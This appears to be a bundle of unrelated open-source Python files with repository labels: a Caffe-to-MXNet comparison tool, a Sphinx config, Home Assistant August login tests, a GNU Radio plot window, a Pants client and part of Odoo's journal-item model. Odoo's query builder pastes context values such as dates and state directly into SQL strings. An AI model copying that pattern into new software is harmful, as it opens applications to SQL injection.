'Pooling', 'ReLU', 'Eltwise', 'Softmax', 'LRN', 'Concat', 'Dropout', 'Crop']: # no parameters to check for these layers pass else: logging.warn('No handling for layer %s of type %s, should we ignore it?', layer.name, layer.type) return def _process_layer_output(caffe_blob_name): logging.debug('processing blob %s', caffe_blob_name) # skip blobs not originating from actual layers, e.g. artificial split layers added by caffe if caffe_blob_name not in top_to_layers: return caf_blob = caffe_net.blobs[caffe_blob_name].data # data should change from BGR to RGB if caffe_blob_name == 'data': # if RGB or RGBA if caf_blob.shape[1] == 3 or caf_blob.shape[1] == 4: # Swapping BGR of caffe into RGB in mxnet caf_blob[:, [0, 2], :, :] = caf_blob[:, [2, 0], :, :] mx_name = 'data' else: # get last layer name which outputs this blob name last_layer_name = top_to_layers[caffe_blob_name][-1] normalized_last_layer_name = re.sub('[-/]', '_', last_layer_name) mx_name = '{}_output'.format(normalized_last_layer_name) if 'scale' in mx_name: mx_name = mx_name.replace('scale', 'bn') elif 'sc' in mx_name: mx_name = mx_name.replace('sc', 'bn') if mx_name not in exe.output_dict: logging.error('mxnet blob %s is missing, time to extend the compare tool..', mx_name) return mx_blob = exe.output_dict[mx_name].asnumpy() _compare_blob(caf_blob, mx_blob, caffe_blob_name, mx_name, 'output', '') return # check layer parameters logging.info('\n***** Network Parameters '.ljust(140, '*')) logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note')) first_layer_name = layer_name_to_record.keys()[0] _bfs(layer_name_to_record[first_layer_name], _process_layer_parameters) # check layer output logging.info('\n***** Network Outputs '.ljust(140, '*')) logging.info(log_format.format('CAFFE', 'MXNET', 'Type', 'Mean(diff)', 'Max(diff)', 'Note')) for caffe_blob_name in caffe_net.blobs.keys(): _process_layer_output(caffe_blob_name) return def main(): """Entrypoint for compare_layers""" parser = argparse.ArgumentParser( description='Tool for testing caffe to mxnet conversion layer by layer') parser.add_argument('--image_url', type=str, default='http://writm.com/wp-content/uploads/2016/08/Cat-hd-wallpapers.jpg', help='input image to test inference, can be either file path or url') parser.add_argument('--caffe_prototxt_path', type=str, default='./model.prototxt', help='path to caffe prototxt') parser.add_argument('--caffe_model_path', type=str, default='./model.caffemodel', help='path to caffe weights') parser.add_argument('--caffe_mean', type=str, default='./model_mean.binaryproto', help='path to caffe mean file') parser.add_argument('--mean_diff_allowed', type=int, default=1e-03, help='mean difference allowed between caffe blob and mxnet blob') parser.add_argument('--max_diff_allowed', type=int, default=1e-01, help='max difference allowed between caffe blob and mxnet blob') parser.add_argument('--gpu', type=int, default=-1, help='the gpu id used for predict') args = parser.parse_args() convert_and_compare_caffe_to_mxnet(args.image_url, args.gpu, args.caffe_prototxt_path, args.caffe_model_path, args.caffe_mean, args.mean_diff_allowed, args.max_diff_allowed) if __name__ == '__main__': main()
apache-2.0
icgc-dcc/dcc-storage
docs/conf.py
1
5104
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # # score documentation build configuration file, created by # sphinx-quickstart on Thu Sep 27 15:44:32 2018. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # # import os # import sys # sys.path.insert(0, os.path.abspath('.')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. # # needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['sphinx.ext.mathjax', 'sphinx.ext.viewcode'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The master toctree document. master_doc = 'index' # General information about the project. project = 'score' copyright = '2018, andricdu' author = 'andricdu' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = '1.4.0' # The full version, including alpha/beta/rc tags. release = '1.4.0' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This patterns also effect to html_static_path and html_extra_path exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. # # html_theme_options = {} # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Custom sidebar templates, must be a dictionary that maps document names # to template names. # # This is required for the alabaster theme # refs: http://alabaster.readthedocs.io/en/latest/installation.html#sidebars html_sidebars = { '**': [ 'relations.html', # needs 'show_related': True theme option to display 'searchbox.html', ] } # -- Options for HTMLHelp output ------------------------------------------ # Output file base name for HTML help builder. htmlhelp_basename = 'scoredoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). # # 'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). # # 'pointsize': '10pt', # Additional stuff for the LaTeX preamble. # # 'preamble': '', # Latex figure (float) alignment # # 'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'score.tex', 'score Documentation', 'andricdu', 'manual'), ] # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ (master_doc, 'score', 'score Documentation', [author], 1) ] # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ (master_doc, 'score', 'score Documentation', author, 'score', 'One line description of project.', 'Miscellaneous'), ]
gpl-3.0
mezz64/home-assistant
tests/components/august/test_config_flow.py
5
9572
"""Test the August config flow.""" from august.authenticator import ValidationResult from homeassistant import config_entries, setup from homeassistant.components.august.const import ( CONF_ACCESS_TOKEN_CACHE_FILE, CONF_INSTALL_ID, CONF_LOGIN_METHOD, DOMAIN, VERIFICATION_CODE_KEY, ) from homeassistant.components.august.exceptions import ( CannotConnect, InvalidAuth, RequireValidation, ) from homeassistant.const import CONF_PASSWORD, CONF_TIMEOUT, CONF_USERNAME from tests.async_mock import patch from tests.common import MockConfigEntry async def test_form(hass): """Test we get the form.""" await setup.async_setup_component(hass, "persistent_notification", {}) result = await hass.config_entries.flow.async_init( DOMAIN, context={"source": config_entries.SOURCE_USER} ) assert result["type"] == "form" assert result["errors"] == {} with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", return_value=True, ), patch( "homeassistant.components.august.async_setup", return_value=True ) as mock_setup, patch( "homeassistant.components.august.async_setup_entry", return_value=True, ) as mock_setup_entry: result2 = await hass.config_entries.flow.async_configure( result["flow_id"], { CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", }, ) await hass.async_block_till_done() assert result2["type"] == "create_entry" assert result2["title"] == "[email protected]" assert result2["data"] == { CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", CONF_INSTALL_ID: None, CONF_TIMEOUT: 10, CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]", } assert len(mock_setup.mock_calls) == 1 assert len(mock_setup_entry.mock_calls) == 1 async def test_form_invalid_auth(hass): """Test we handle invalid auth.""" result = await hass.config_entries.flow.async_init( DOMAIN, context={"source": config_entries.SOURCE_USER} ) with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", side_effect=InvalidAuth, ): result2 = await hass.config_entries.flow.async_configure( result["flow_id"], { CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", }, ) assert result2["type"] == "form" assert result2["errors"] == {"base": "invalid_auth"} async def test_user_unexpected_exception(hass): """Test we handle an unexpected exception.""" result = await hass.config_entries.flow.async_init( DOMAIN, context={"source": config_entries.SOURCE_USER} ) with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", side_effect=ValueError, ): result2 = await hass.config_entries.flow.async_configure( result["flow_id"], { CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", }, ) assert result2["type"] == "form" assert result2["errors"] == {"base": "unknown"} async def test_form_cannot_connect(hass): """Test we handle cannot connect error.""" result = await hass.config_entries.flow.async_init( DOMAIN, context={"source": config_entries.SOURCE_USER} ) with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", side_effect=CannotConnect, ): result2 = await hass.config_entries.flow.async_configure( result["flow_id"], { CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", }, ) assert result2["type"] == "form" assert result2["errors"] == {"base": "cannot_connect"} async def test_form_needs_validate(hass): """Test we present validation when we need to validate.""" result = await hass.config_entries.flow.async_init( DOMAIN, context={"source": config_entries.SOURCE_USER} ) with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", side_effect=RequireValidation, ), patch( "homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code", return_value=True, ) as mock_send_verification_code: result2 = await hass.config_entries.flow.async_configure( result["flow_id"], { CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", }, ) assert len(mock_send_verification_code.mock_calls) == 1 assert result2["type"] == "form" assert result2["errors"] is None assert result2["step_id"] == "validation" # Try with the WRONG verification code give us the form back again with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", side_effect=RequireValidation, ), patch( "homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code", return_value=ValidationResult.INVALID_VERIFICATION_CODE, ) as mock_validate_verification_code, patch( "homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code", return_value=True, ) as mock_send_verification_code, patch( "homeassistant.components.august.async_setup", return_value=True ) as mock_setup, patch( "homeassistant.components.august.async_setup_entry", return_value=True ) as mock_setup_entry: result3 = await hass.config_entries.flow.async_configure( result["flow_id"], {VERIFICATION_CODE_KEY: "incorrect"}, ) # Make sure we do not resend the code again # so they have a chance to retry assert len(mock_send_verification_code.mock_calls) == 0 assert len(mock_validate_verification_code.mock_calls) == 1 assert result3["type"] == "form" assert result3["errors"] is None assert result3["step_id"] == "validation" # Try with the CORRECT verification code and we setup with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", return_value=True, ), patch( "homeassistant.components.august.gateway.AuthenticatorAsync.async_validate_verification_code", return_value=ValidationResult.VALIDATED, ) as mock_validate_verification_code, patch( "homeassistant.components.august.gateway.AuthenticatorAsync.async_send_verification_code", return_value=True, ) as mock_send_verification_code, patch( "homeassistant.components.august.async_setup", return_value=True ) as mock_setup, patch( "homeassistant.components.august.async_setup_entry", return_value=True ) as mock_setup_entry: result4 = await hass.config_entries.flow.async_configure( result["flow_id"], {VERIFICATION_CODE_KEY: "correct"}, ) await hass.async_block_till_done() assert len(mock_send_verification_code.mock_calls) == 0 assert len(mock_validate_verification_code.mock_calls) == 1 assert result4["type"] == "create_entry" assert result4["title"] == "[email protected]" assert result4["data"] == { CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", CONF_INSTALL_ID: None, CONF_TIMEOUT: 10, CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]", } assert len(mock_setup.mock_calls) == 1 assert len(mock_setup_entry.mock_calls) == 1 async def test_form_reauth(hass): """Test reauthenticate.""" entry = MockConfigEntry( domain=DOMAIN, data={ CONF_LOGIN_METHOD: "email", CONF_USERNAME: "[email protected]", CONF_PASSWORD: "test-password", CONF_INSTALL_ID: None, CONF_TIMEOUT: 10, CONF_ACCESS_TOKEN_CACHE_FILE: "[email protected]", }, unique_id="[email protected]", ) entry.add_to_hass(hass) result = await hass.config_entries.flow.async_init( DOMAIN, context={"source": "reauth"}, data=entry.data ) assert result["type"] == "form" assert result["errors"] == {} with patch( "homeassistant.components.august.config_flow.AugustGateway.async_authenticate", return_value=True, ), patch( "homeassistant.components.august.async_setup", return_value=True ) as mock_setup, patch( "homeassistant.components.august.async_setup_entry", return_value=True, ) as mock_setup_entry: result2 = await hass.config_entries.flow.async_configure( result["flow_id"], { CONF_PASSWORD: "new-test-password", }, ) await hass.async_block_till_done() assert result2["type"] == "abort" assert result2["reason"] == "reauth_successful" assert len(mock_setup.mock_calls) == 1 assert len(mock_setup_entry.mock_calls) == 1
apache-2.0
MingdaZhou/gnuradio
gr-wxgui/python/wxgui/const_window.py
58
6131
# # Copyright 2008 Free Software Foundation, Inc. # # This file is part of GNU Radio # # GNU Radio is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 3, or (at your option) # any later version. # # GNU Radio is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with GNU Radio; see the file COPYING. If not, write to # the Free Software Foundation, Inc., 51 Franklin Street, # Boston, MA 02110-1301, USA. # ################################################## # Imports ################################################## import plotter import common import wx import numpy import math import pubsub from constants import * from gnuradio import gr #for gr.prefs import forms ################################################## # Constants ################################################## SLIDER_STEPS = 200 LOOP_BW_MIN_EXP, LOOP_BW_MAX_EXP = -6, 0.0 GAIN_MU_MIN_EXP, GAIN_MU_MAX_EXP = -6, -0.301 DEFAULT_FRAME_RATE = gr.prefs().get_long('wxgui', 'const_rate', 5) DEFAULT_WIN_SIZE = (500, 400) DEFAULT_CONST_SIZE = gr.prefs().get_long('wxgui', 'const_size', 2048) CONST_PLOT_COLOR_SPEC = (0, 0, 1) MARKER_TYPES = ( ('Dot Small', 1.0), ('Dot Medium', 2.0), ('Dot Large', 3.0), ('Line Link', None), ) DEFAULT_MARKER_TYPE = 2.0 ################################################## # Constellation window control panel ################################################## class control_panel(wx.Panel): """ A control panel with wx widgits to control the plotter. """ def __init__(self, parent): """ Create a new control panel. Args: parent: the wx parent window """ self.parent = parent wx.Panel.__init__(self, parent, style=wx.SUNKEN_BORDER) parent[SHOW_CONTROL_PANEL_KEY] = True parent.subscribe(SHOW_CONTROL_PANEL_KEY, self.Show) control_box = forms.static_box_sizer( parent=self, label='Options', bold=True, orient=wx.VERTICAL, ) #loop_bw control_box.AddStretchSpacer() forms.text_box( sizer=control_box, parent=self, label='Loop Bandwidth', converter=forms.float_converter(), ps=parent, key=LOOP_BW_KEY, ) forms.log_slider( sizer=control_box, parent=self, min_exp=LOOP_BW_MIN_EXP, max_exp=LOOP_BW_MAX_EXP, num_steps=SLIDER_STEPS, ps=parent, key=LOOP_BW_KEY, ) #gain_mu control_box.AddStretchSpacer() forms.text_box( sizer=control_box, parent=self, label='Gain Mu', converter=forms.float_converter(), ps=parent, key=GAIN_MU_KEY, ) forms.log_slider( sizer=control_box, parent=self, min_exp=GAIN_MU_MIN_EXP, max_exp=GAIN_MU_MAX_EXP, num_steps=SLIDER_STEPS, ps=parent, key=GAIN_MU_KEY, ) #marker control_box.AddStretchSpacer() forms.drop_down( sizer=control_box, parent=self, ps=parent, key=MARKER_KEY, label='Marker', choices=map(lambda x: x[1], MARKER_TYPES), labels=map(lambda x: x[0], MARKER_TYPES), ) #run/stop control_box.AddStretchSpacer() forms.toggle_button( sizer=control_box, parent=self, true_label='Stop', false_label='Run', ps=parent, key=RUNNING_KEY, ) #set sizer self.SetSizerAndFit(control_box) ################################################## # Constellation window with plotter and control panel ################################################## class const_window(wx.Panel, pubsub.pubsub): def __init__( self, parent, controller, size, title, msg_key, loop_bw_key, gain_mu_key, gain_omega_key, omega_key, sample_rate_key, ): pubsub.pubsub.__init__(self) #proxy the keys self.proxy(MSG_KEY, controller, msg_key) self.proxy(LOOP_BW_KEY, controller, loop_bw_key) self.proxy(GAIN_MU_KEY, controller, gain_mu_key) self.proxy(GAIN_OMEGA_KEY, controller, gain_omega_key) self.proxy(OMEGA_KEY, controller, omega_key) self.proxy(SAMPLE_RATE_KEY, controller, sample_rate_key) #initialize values self[RUNNING_KEY] = True self[X_DIVS_KEY] = 8 self[Y_DIVS_KEY] = 8 self[MARKER_KEY] = DEFAULT_MARKER_TYPE #init panel and plot wx.Panel.__init__(self, parent, style=wx.SIMPLE_BORDER) self.plotter = plotter.channel_plotter(self) self.plotter.SetSize(wx.Size(*size)) self.plotter.SetSizeHints(*size) self.plotter.set_title(title) self.plotter.set_x_label('Inphase') self.plotter.set_y_label('Quadrature') self.plotter.enable_point_label(True) self.plotter.enable_grid_lines(True) #setup the box with plot and controls self.control_panel = control_panel(self) main_box = wx.BoxSizer(wx.HORIZONTAL) main_box.Add(self.plotter, 1, wx.EXPAND) main_box.Add(self.control_panel, 0, wx.EXPAND) self.SetSizerAndFit(main_box) #alpha and gain mu 2nd orders def set_gain_omega(gain_mu): self[GAIN_OMEGA_KEY] = .25*gain_mu**2 self.subscribe(GAIN_MU_KEY, set_gain_omega) #register events self.subscribe(MSG_KEY, self.handle_msg) self.subscribe(X_DIVS_KEY, self.update_grid) self.subscribe(Y_DIVS_KEY, self.update_grid) #initial update self.update_grid() def handle_msg(self, msg): """ Plot the samples onto the complex grid. Args: msg: the array of complex samples """ if not self[RUNNING_KEY]: return #convert to complex floating point numbers samples = numpy.fromstring(msg, numpy.complex64) real = numpy.real(samples) imag = numpy.imag(samples) #plot self.plotter.set_waveform( channel=0, samples=(real, imag), color_spec=CONST_PLOT_COLOR_SPEC, marker=self[MARKER_KEY], ) #update the plotter self.plotter.update() def update_grid(self): #update the x axis x_max = 2.0 self.plotter.set_x_grid(-x_max, x_max, common.get_clean_num(2.0*x_max/self[X_DIVS_KEY])) #update the y axis y_max = 2.0 self.plotter.set_y_grid(-y_max, y_max, common.get_clean_num(2.0*y_max/self[Y_DIVS_KEY])) #update plotter self.plotter.update()
gpl-3.0
manasapte/pants
src/python/pants/bin/remote_pants_runner.py
7
3179
# coding=utf-8 # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md). # Licensed under the Apache License, Version 2.0 (see LICENSE). from __future__ import (absolute_import, division, generators, nested_scopes, print_function, unicode_literals, with_statement) import signal import sys from contextlib import contextmanager from pants.java.nailgun_client import NailgunClient from pants.java.nailgun_protocol import NailgunProtocol from pants.pantsd.process_manager import ProcessMetadataManager class RemotePantsRunner(object): """A thin client variant of PantsRunner.""" class PortNotFound(Exception): pass PANTS_COMMAND = 'pants' RECOVERABLE_EXCEPTIONS = (PortNotFound, NailgunClient.NailgunConnectionError) def __init__(self, exiter, args, env, process_metadata_dir=None, stdin=None, stdout=None, stderr=None): """ :param Exiter exiter: The Exiter instance to use for this run. :param list args: The arguments (e.g. sys.argv) for this run. :param dict env: The environment (e.g. os.environ) for this run. :param str process_metadata_dir: The directory in which process metadata is kept. :param file stdin: The stream representing stdin. :param file stdout: The stream representing stdout. :param file stderr: The stream representing stderr. """ self._exiter = exiter self._args = args self._env = env self._process_metadata_dir = process_metadata_dir self._stdin = stdin or sys.stdin self._stdout = stdout or sys.stdout self._stderr = stderr or sys.stderr self._port = self._retrieve_pailgun_port() if not self._port: raise self.PortNotFound('unable to locate pailgun port!') @staticmethod def _combine_dicts(*dicts): """Combine one or more dicts into a new, unified dict (dicts to the right take precedence).""" return {k: v for d in dicts for k, v in d.items()} @contextmanager def _trapped_control_c(self, client): """A contextmanager that overrides the SIGINT (control-c) handler and handles it remotely.""" def handle_control_c(signum, frame): client.send_control_c() existing_sigint_handler = signal.signal(signal.SIGINT, handle_control_c) signal.siginterrupt(signal.SIGINT, False) # Retry interrupted system calls. try: yield finally: signal.signal(signal.SIGINT, existing_sigint_handler) def _retrieve_pailgun_port(self): return ProcessMetadataManager( self._process_metadata_dir).read_metadata_by_name('pantsd', 'socket_pailgun', int) def run(self, args=None): # Merge the nailgun TTY capability environment variables with the passed environment dict. ng_env = NailgunProtocol.isatty_to_env(self._stdin, self._stdout, self._stderr) modified_env = self._combine_dicts(self._env, ng_env) # Instantiate a NailgunClient. client = NailgunClient(port=self._port, ins=self._stdin, out=self._stdout, err=self._stderr) with self._trapped_control_c(client): # Execute the command on the pailgun. result = client.execute(self.PANTS_COMMAND, *self._args, **modified_env) # Exit. self._exiter.exit(result)
apache-2.0
darkleons/odoo
addons/account/account_move_line.py
9
78170
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from datetime import datetime from openerp import workflow from openerp.osv import fields, osv from openerp.tools.translate import _ import openerp.addons.decimal_precision as dp from openerp import tools from openerp.report import report_sxw import openerp class account_move_line(osv.osv): _name = "account.move.line" _description = "Journal Items" def _query_get(self, cr, uid, obj='l', context=None): fiscalyear_obj = self.pool.get('account.fiscalyear') fiscalperiod_obj = self.pool.get('account.period') account_obj = self.pool.get('account.account') fiscalyear_ids = [] context = dict(context or {}) initial_bal = context.get('initial_bal', False) company_clause = " " if context.get('company_id', False): company_clause = " AND " +obj+".company_id = %s" % context.get('company_id', False) if not context.get('fiscalyear', False): if context.get('all_fiscalyear', False): #this option is needed by the aged balance report because otherwise, if we search only the draft ones, an open invoice of a closed fiscalyear won't be displayed fiscalyear_ids = fiscalyear_obj.search(cr, uid, []) else: fiscalyear_ids = fiscalyear_obj.search(cr, uid, [('state', '=', 'draft')]) else: #for initial balance as well as for normal query, we check only the selected FY because the best practice is to generate the FY opening entries fiscalyear_ids = [context['fiscalyear']] fiscalyear_clause = (','.join([str(x) for x in fiscalyear_ids])) or '0' state = context.get('state', False) where_move_state = '' where_move_lines_by_date = '' if context.get('date_from', False) and context.get('date_to', False): if initial_bal: where_move_lines_by_date = " AND " +obj+".move_id IN (SELECT id FROM account_move WHERE date < '" +context['date_from']+"')" else: where_move_lines_by_date = " AND " +obj+".move_id IN (SELECT id FROM account_move WHERE date >= '" +context['date_from']+"' AND date <= '"+context['date_to']+"')" if state: if state.lower() not in ['all']: where_move_state= " AND "+obj+".move_id IN (SELECT id FROM account_move WHERE account_move.state = '"+state+"')" if context.get('period_from', False) and context.get('period_to', False) and not context.get('periods', False): if initial_bal: period_company_id = fiscalperiod_obj.browse(cr, uid, context['period_from'], context=context).company_id.id first_period = fiscalperiod_obj.search(cr, uid, [('company_id', '=', period_company_id)], order='date_start', limit=1)[0] context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, first_period, context['period_from']) else: context['periods'] = fiscalperiod_obj.build_ctx_periods(cr, uid, context['period_from'], context['period_to']) if context.get('periods', False): if initial_bal: query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s" % (fiscalyear_clause, where_move_state, where_move_lines_by_date) period_ids = fiscalperiod_obj.search(cr, uid, [('id', 'in', context['periods'])], order='date_start', limit=1) if period_ids and period_ids[0]: first_period = fiscalperiod_obj.browse(cr, uid, period_ids[0], context=context) ids = ','.join([str(x) for x in context['periods']]) query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND date_start <= '%s' AND id NOT IN (%s)) %s %s" % (fiscalyear_clause, first_period.date_start, ids, where_move_state, where_move_lines_by_date) else: ids = ','.join([str(x) for x in context['periods']]) query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s) AND id IN (%s)) %s %s" % (fiscalyear_clause, ids, where_move_state, where_move_lines_by_date) else: query = obj+".state <> 'draft' AND "+obj+".period_id IN (SELECT id FROM account_period WHERE fiscalyear_id IN (%s)) %s %s" % (fiscalyear_clause, where_move_state, where_move_lines_by_date) if initial_bal and not context.get('periods', False) and not where_move_lines_by_date: #we didn't pass any filter in the context, and the initial balance can't be computed using only the fiscalyear otherwise entries will be summed twice #so we have to invalidate this query raise osv.except_osv(_('Warning!'),_("You have not supplied enough arguments to compute the initial balance, please select a period and a journal in the context.")) if context.get('journal_ids', False): query += ' AND '+obj+'.journal_id IN (%s)' % ','.join(map(str, context['journal_ids'])) if context.get('chart_account_id', False): child_ids = account_obj._get_children_and_consol(cr, uid, [context['chart_account_id']], context=context) query += ' AND '+obj+'.account_id IN (%s)' % ','.join(map(str, child_ids)) query += company_clause return query def _amount_residual(self, cr, uid, ids, field_names, args, context=None): """ This function returns the residual amount on a receivable or payable account.move.line. By default, it returns an amount in the currency of this journal entry (maybe different of the company currency), but if you pass 'residual_in_company_currency' = True in the context then the returned amount will be in company currency. """ res = {} if context is None: context = {} cur_obj = self.pool.get('res.currency') for move_line in self.browse(cr, uid, ids, context=context): res[move_line.id] = { 'amount_residual': 0.0, 'amount_residual_currency': 0.0, } if move_line.reconcile_id: continue if not move_line.account_id.reconcile: #this function does not suport to be used on move lines not related to a reconcilable account continue if move_line.currency_id: move_line_total = move_line.amount_currency sign = move_line.amount_currency < 0 and -1 or 1 else: move_line_total = move_line.debit - move_line.credit sign = (move_line.debit - move_line.credit) < 0 and -1 or 1 line_total_in_company_currency = move_line.debit - move_line.credit context_unreconciled = context.copy() if move_line.reconcile_partial_id: for payment_line in move_line.reconcile_partial_id.line_partial_ids: if payment_line.id == move_line.id: continue if payment_line.currency_id and move_line.currency_id and payment_line.currency_id.id == move_line.currency_id.id: move_line_total += payment_line.amount_currency else: if move_line.currency_id: context_unreconciled.update({'date': payment_line.date}) amount_in_foreign_currency = cur_obj.compute(cr, uid, move_line.company_id.currency_id.id, move_line.currency_id.id, (payment_line.debit - payment_line.credit), round=False, context=context_unreconciled) move_line_total += amount_in_foreign_currency else: move_line_total += (payment_line.debit - payment_line.credit) line_total_in_company_currency += (payment_line.debit - payment_line.credit) result = move_line_total res[move_line.id]['amount_residual_currency'] = sign * (move_line.currency_id and self.pool.get('res.currency').round(cr, uid, move_line.currency_id, result) or result) res[move_line.id]['amount_residual'] = sign * line_total_in_company_currency return res def default_get(self, cr, uid, fields, context=None): data = self._default_get(cr, uid, fields, context=context) for f in data.keys(): if f not in fields: del data[f] return data def _prepare_analytic_line(self, cr, uid, obj_line, context=None): """ Prepare the values given at the create() of account.analytic.line upon the validation of a journal item having an analytic account. This method is intended to be extended in other modules. :param obj_line: browse record of the account.move.line that triggered the analytic line creation """ return {'name': obj_line.name, 'date': obj_line.date, 'account_id': obj_line.analytic_account_id.id, 'unit_amount': obj_line.quantity, 'product_id': obj_line.product_id and obj_line.product_id.id or False, 'product_uom_id': obj_line.product_uom_id and obj_line.product_uom_id.id or False, 'amount': (obj_line.credit or 0.0) - (obj_line.debit or 0.0), 'general_account_id': obj_line.account_id.id, 'journal_id': obj_line.journal_id.analytic_journal_id.id, 'ref': obj_line.ref, 'move_id': obj_line.id, 'user_id': uid, } def create_analytic_lines(self, cr, uid, ids, context=None): acc_ana_line_obj = self.pool.get('account.analytic.line') for obj_line in self.browse(cr, uid, ids, context=context): if obj_line.analytic_account_id: if not obj_line.journal_id.analytic_journal_id: raise osv.except_osv(_('No Analytic Journal!'),_("You have to define an analytic journal on the '%s' journal!") % (obj_line.journal_id.name, )) if obj_line.analytic_lines: acc_ana_line_obj.unlink(cr,uid,[obj.id for obj in obj_line.analytic_lines]) vals_line = self._prepare_analytic_line(cr, uid, obj_line, context=context) acc_ana_line_obj.create(cr, uid, vals_line) return True def _default_get_move_form_hook(self, cursor, user, data): '''Called in the end of default_get method for manual entry in account_move form''' if data.has_key('analytic_account_id'): del(data['analytic_account_id']) if data.has_key('account_tax_id'): del(data['account_tax_id']) return data def convert_to_period(self, cr, uid, context=None): if context is None: context = {} period_obj = self.pool.get('account.period') #check if the period_id changed in the context from client side if context.get('period_id', False): period_id = context.get('period_id') if type(period_id) == str: ids = period_obj.search(cr, uid, [('name', 'ilike', period_id)]) context = dict(context, period_id=ids and ids[0] or False) return context def _default_get(self, cr, uid, fields, context=None): #default_get should only do the following: # -propose the next amount in debit/credit in order to balance the move # -propose the next account from the journal (default debit/credit account) accordingly context = dict(context or {}) account_obj = self.pool.get('account.account') period_obj = self.pool.get('account.period') journal_obj = self.pool.get('account.journal') move_obj = self.pool.get('account.move') tax_obj = self.pool.get('account.tax') fiscal_pos_obj = self.pool.get('account.fiscal.position') partner_obj = self.pool.get('res.partner') currency_obj = self.pool.get('res.currency') if not context.get('journal_id', False): context['journal_id'] = context.get('search_default_journal_id', False) if not context.get('period_id', False): context['period_id'] = context.get('search_default_period_id', False) context = self.convert_to_period(cr, uid, context) # Compute simple values data = super(account_move_line, self).default_get(cr, uid, fields, context=context) if context.get('journal_id'): total = 0.0 #in account.move form view, it is not possible to compute total debit and credit using #a browse record. So we must use the context to pass the whole one2many field and compute the total if context.get('line_id'): for move_line_dict in move_obj.resolve_2many_commands(cr, uid, 'line_id', context.get('line_id'), context=context): data['name'] = data.get('name') 